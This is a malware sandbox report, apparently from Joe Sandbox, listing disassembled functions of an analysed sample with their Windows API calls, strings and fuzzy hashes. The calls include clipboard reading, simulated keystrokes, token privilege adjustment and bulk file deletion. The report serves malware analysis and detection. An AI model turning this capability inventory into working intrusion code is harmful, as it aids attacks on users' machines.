Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1c9586b07810ceef6c55ca15475780cd5771201a81303f12573339a0a1d165db
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: E831A274A00105DBD718DF58C494AA9FBA6FF49350B6486A5E40ACB366DB32EDC2CB90

Function 006A9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006A9A80

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8a2996bf1b7214311a646d995455a42038519966ee53dd15b7778ac3539d712e
Instruction ID: 2ee90de5b55beb22c5319149e7bcf510512521815bb0cbccdbf3c55341d7c4e5
Opcode Fuzzy Hash: 8a2996bf1b7214311a646d995455a42038519966ee53dd15b7778ac3539d712e
Instruction Fuzzy Hash: 1C415D74504611CFEB24DF14C484B5ABBE2BF45304F2989ACE9964B762C372EC86CF52

Function 006341A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00634214: FreeLibrary.KERNEL32(00000000,?), ref: 00634247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006339FE,?,00000001), ref: 006341DB

Part of subcall function 00634291: FreeLibrary.KERNEL32(00000000), ref: 006342C4

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 62cbcdddd61373df250dff3b4642b39b9af1de0f225be6b5514743c07002d12f
Instruction ID: 41c87295edf2974b6f66b6d1200a446031bb250e25bf093840994d0855b08471
Opcode Fuzzy Hash: 62cbcdddd61373df250dff3b4642b39b9af1de0f225be6b5514743c07002d12f
Instruction Fuzzy Hash: 9111A731600306AADB50BF74DC16F9EB7E79F80700F10842DF596BA1C1DE75AB459BA4

Function 006A9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 006A9B51

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5f52b098eae7bf17d82c6b32d502eeeaff0b1d94824805ce07033fe39dbb4eec
Instruction ID: 50c7681de550f89880b1532f3d0a10a2d930af35ba94b941ee668bb18e4441c7
Opcode Fuzzy Hash: 5f52b098eae7bf17d82c6b32d502eeeaff0b1d94824805ce07033fe39dbb4eec
Instruction Fuzzy Hash: 60212574508611CFEB24DF68C444B5BBBE2BF85304F15496CEA9A4B362D732E846CF92

Function 0065AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0065AFC0

Part of subcall function 00657BDA: __getptd_noexit.LIBCMT ref: 00657BDA

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: aeb2ceabc95d5c35adbe59ded4fc6c71a7b90896534dae2a995eb543a39ba84e
Instruction ID: 6997dc347adbdd04a1fb3e0e9fbc147c9f88465d819f311a5a599b8795f0b4b5
Opcode Fuzzy Hash: aeb2ceabc95d5c35adbe59ded4fc6c71a7b90896534dae2a995eb543a39ba84e
Instruction Fuzzy Hash: 7E1160B28056109FD7526FA4DC4276D7663AF41333F195348EC741B2E2D7B48D098BA9

Function 006339DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: a79e30354e8632b68278ccf995177ddb13d7172470efc1ab560ef7f77c9200b6
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 6D01363154010AAECF45EF64C8918FFBB76AF11344F108069B55597195EA30AB49DFA4

Function 00652AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00652AED

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 0c9210d152113fede4be7d71b96c5e50943a155c134ae5f66a36fc307bf1c8c4
Instruction ID: a6884030d60abf8d46f89e2861f0b41240db6f746c6976ebe71575c7d717bf7e
Opcode Fuzzy Hash: 0c9210d152113fede4be7d71b96c5e50943a155c134ae5f66a36fc307bf1c8c4
Instruction Fuzzy Hash: 8BF0C231500207AADF61AF75CC023DF36A3BF01322F154419BC109B291C7788A6ADB45

Function 00634252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,006339FE,?,00000001), ref: 00634286

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1b3f74a47c66eb10b92b81cc35f86b86a0b6725a38a8992831228b74ca644b3e
Instruction ID: e7a6a49afe5c8dd84abdd3f2a4131d82e9371fe501a60d6cc0aea65a53e8fbef
Opcode Fuzzy Hash: 1b3f74a47c66eb10b92b81cc35f86b86a0b6725a38a8992831228b74ca644b3e
Instruction Fuzzy Hash: D1F0A070408302CFCB348F64D480853FBE2BF003157208A3EF1C692610CB72AA40DF80

Function 006340A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006340C6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 1a3d83293d154f564f6d466b3903921841cb8a7193c759819b68c3ba22d9bd9e
Instruction ID: c62c3872d4f7d6a2b163d64a1a0311410891b5623e83aa2ab49d86c660286910
Opcode Fuzzy Hash: 1a3d83293d154f564f6d466b3903921841cb8a7193c759819b68c3ba22d9bd9e
Instruction Fuzzy Hash: 6CE0C2766002246BC711A758CC46FEA77AEDF886A0F0941B9F909E7244EA74A9C18694

Function 012F7068 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 012F7079

Memory Dump Source

Source File: 00000000.00000002.1270023088.00000000012F4000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12f4000_HN1GiQ5tF7.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 9f106cb9210f24ee990f5b4b88625ba006dba71f7d1f1a24c5d9feac9c60b21d
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 47E0E67494020DDFDB00DFB4D54969E7BB4EF04301F1001A5FD05D2280D6309D50CA62

Non-executed Functions

Function 0069AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0069B1CD

Strings

%d/%02d/%02d, xrefs: 0069AEFC

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: db3589b63e5283ecff1abb8ad6c3f06d857bb3ecf2689b6d6928b10bf32daceb
Instruction ID: a3583263b06f228e4783d3cd00cc21fdf55609f41b03d5fd2bac4471d14d402c
Opcode Fuzzy Hash: db3589b63e5283ecff1abb8ad6c3f06d857bb3ecf2689b6d6928b10bf32daceb
Instruction Fuzzy Hash: 5012BFB1500208ABEF248F64DD49FAA7BFAFF85710F10422AF915DB6D1EB708942CB51

Function 0064EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0064EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006A3AEA
IsIconic.USER32(000000FF), ref: 006A3AF3
ShowWindow.USER32(000000FF,00000009), ref: 006A3B00
SetForegroundWindow.USER32(000000FF), ref: 006A3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006A3B20
GetCurrentThreadId.KERNEL32 ref: 006A3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 006A3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 006A3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 006A3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 006A3B54
SetForegroundWindow.USER32(000000FF), ref: 006A3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A3B6C
keybd_event.USER32(00000012,00000000), ref: 006A3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A3B81
keybd_event.USER32(00000012,00000000), ref: 006A3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A3B8F
keybd_event.USER32(00000012,00000000), ref: 006A3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 006A3B9E
keybd_event.USER32(00000012,00000000), ref: 006A3BA3
SetForegroundWindow.USER32(000000FF), ref: 006A3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 006A3BCD

Strings

Shell_TrayWnd, xrefs: 006A3AE5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 64de9fa9d45aac19d0aa1a0adf5b6997bd862563e4e8cfc27bfc4a5d30ebff6d
Instruction ID: 139b11fcd0a0592b975daec8e1d26152ce2c934d93df602c23e09e1298a6eec1
Opcode Fuzzy Hash: 64de9fa9d45aac19d0aa1a0adf5b6997bd862563e4e8cfc27bfc4a5d30ebff6d
Instruction Fuzzy Hash: A731B6B1A403287BEB306B658C49FBF3E6EEB45B50F104125FA05EE2D0E6B15D419EB0

Function 0066ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0066B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0066B180
Part of subcall function 0066B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0066B1AD
Part of subcall function 0066B134: GetLastError.KERNEL32 ref: 0066B1BA

_memset.LIBCMT ref: 0066AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0066AD5A
CloseHandle.KERNEL32(?), ref: 0066AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0066AD82
GetProcessWindowStation.USER32 ref: 0066AD9B
SetProcessWindowStation.USER32(00000000), ref: 0066ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0066ADBF

Part of subcall function 0066AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0066ACC0), ref: 0066AB99
Part of subcall function 0066AB84: CloseHandle.KERNEL32(?,?,0066ACC0), ref: 0066ABAB

Strings

, xrefs: 0066AD17
winsta0, xrefs: 0066AD7D
H*n, xrefs: 0066AE40
default, xrefs: 0066ADBA

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*n$default$winsta0
API String ID: 2063423040-1627624388
Opcode ID: f69e7c91636d213b4ef6bbdc8674dbeeeb049801e6fc8bfa2a698d8a88283769
Instruction ID: 8417c48008a933de442fe263595789c336d28d3e58e2d2abd9a0a64aaf7692ce
Opcode Fuzzy Hash: f69e7c91636d213b4ef6bbdc8674dbeeeb049801e6fc8bfa2a698d8a88283769
Instruction Fuzzy Hash: DF816FB1800249AFDF119FE4DC45AEEBB7AEF04304F048129F914B6261E7328E55DF62

Function 006760DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00676EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00675FA6,?), ref: 00676ED8

Part of subcall function 00676EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00675FA6,?), ref: 00676EF1

Part of subcall function 0067725E: __wsplitpath.LIBCMT ref: 0067727B
Part of subcall function 0067725E: __wsplitpath.LIBCMT ref: 0067728E

Part of subcall function 006772CB: GetFileAttributesW.KERNEL32(?,00676019), ref: 006772CC

_wcscat.LIBCMT ref: 00676149
_wcscat.LIBCMT ref: 00676167
__wsplitpath.LIBCMT ref: 0067618E
FindFirstFileW.KERNEL32(?,?), ref: 006761A4
_wcscpy.LIBCMT ref: 00676209
_wcscat.LIBCMT ref: 0067621C
_wcscat.LIBCMT ref: 0067622F
lstrcmpiW.KERNEL32(?,?), ref: 0067625D
DeleteFileW.KERNEL32(?), ref: 0067626E
MoveFileW.KERNEL32(?,?), ref: 00676289
MoveFileW.KERNEL32(?,?), ref: 00676298
CopyFileW.KERNEL32(?,?,00000000), ref: 006762AD
DeleteFileW.KERNEL32(?), ref: 006762BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 006762E1
FindClose.KERNEL32(00000000), ref: 006762FD
FindClose.KERNEL32(00000000), ref: 0067630B

Strings

\*.*, xrefs: 00676138, 00676147, 00676165

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 4179d20000b328727543f0a383f9c2282219626f817b69773a515c242f8f1260
Instruction ID: 3b57b23c6ac2d6e90e272f4ea11b9bcafc94f24279e5b04ac89d097d46e880a0
Opcode Fuzzy Hash: 4179d20000b328727543f0a383f9c2282219626f817b69773a515c242f8f1260
Instruction Fuzzy Hash: 145112B290811C6ACB21EB95CC44DDB77BDAF05310F0541EAF599E3142EE3697898FA8

Function 00686B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(006CDC00), ref: 00686B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00686B44
GetClipboardData.USER32(0000000D), ref: 00686B4C
CloseClipboard.USER32 ref: 00686B58
GlobalLock.KERNEL32(00000000), ref: 00686B74
CloseClipboard.USER32 ref: 00686B7E
GlobalUnlock.KERNEL32(00000000), ref: 00686B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00686BA0
GetClipboardData.USER32(00000001), ref: 00686BA8
GlobalLock.KERNEL32(00000000), ref: 00686BB5
GlobalUnlock.KERNEL32(00000000), ref: 00686BE9
CloseClipboard.USER32 ref: 00686CF6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5b20da4894cb279e1002e243b415cbd9561bd013c6a3f25f15cb8a79e46b41b5
Instruction ID: 9e97ed87809d4a39f0b5947ba4445727c2c893e09bf583e40f920a12fe5ce578
Opcode Fuzzy Hash: 5b20da4894cb279e1002e243b415cbd9561bd013c6a3f25f15cb8a79e46b41b5
Instruction Fuzzy Hash: EF519FB1240201ABD300BF60DD86F6E77AAEF84B10F00422DF656DA2E1EF70D945CB66

Function 0067F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0067F62B
FindClose.KERNEL32(00000000), ref: 0067F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0067F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0067F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 0067F6E2
__swprintf.LIBCMT ref: 0067F72E
__swprintf.LIBCMT ref: 0067F767
__swprintf.LIBCMT ref: 0067F7BB

Part of subcall function 0065172B: __woutput_l.LIBCMT ref: 00651784

__swprintf.LIBCMT ref: 0067F809
__swprintf.LIBCMT ref: 0067F858
__swprintf.LIBCMT ref: 0067F8A7
__swprintf.LIBCMT ref: 0067F8F6

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0067F728
%02d, xrefs: 0067F7B0, 0067F7B9, 0067F807, 0067F856, 0067F8A5, 0067F8F4
%4d, xrefs: 0067F761

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: df8610b6847e11055d0b0b4617b1fec3b52af333cd5333bc6e3e3940cd745bde
Instruction ID: ab6ca20c0d1daef206d854bc116efdb21e5782549f493192c3b03a3c8d15bba2
Opcode Fuzzy Hash: df8610b6847e11055d0b0b4617b1fec3b52af333cd5333bc6e3e3940cd745bde
Instruction Fuzzy Hash: 7CA13EB2408344ABC354EBA5CC85DAFB7EDAF98700F40092EF59587191EB34DA49CB66

Function 00681B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00681B50
_wcscmp.LIBCMT ref: 00681B65
_wcscmp.LIBCMT ref: 00681B7C
GetFileAttributesW.KERNEL32(?), ref: 00681B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00681BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00681BC0
FindClose.KERNEL32(00000000), ref: 00681BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00681BE7
_wcscmp.LIBCMT ref: 00681C0E
_wcscmp.LIBCMT ref: 00681C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00681C37
SetCurrentDirectoryW.KERNEL32(006E39FC), ref: 00681C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00681C5F
FindClose.KERNEL32(00000000), ref: 00681C6C
FindClose.KERNEL32(00000000), ref: 00681C7C

Strings

*.*, xrefs: 00681BE2

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 29a46417e0f4df5a949e4cafd19fc51f84d51457b4fb53f36ac74a8497dd9ada
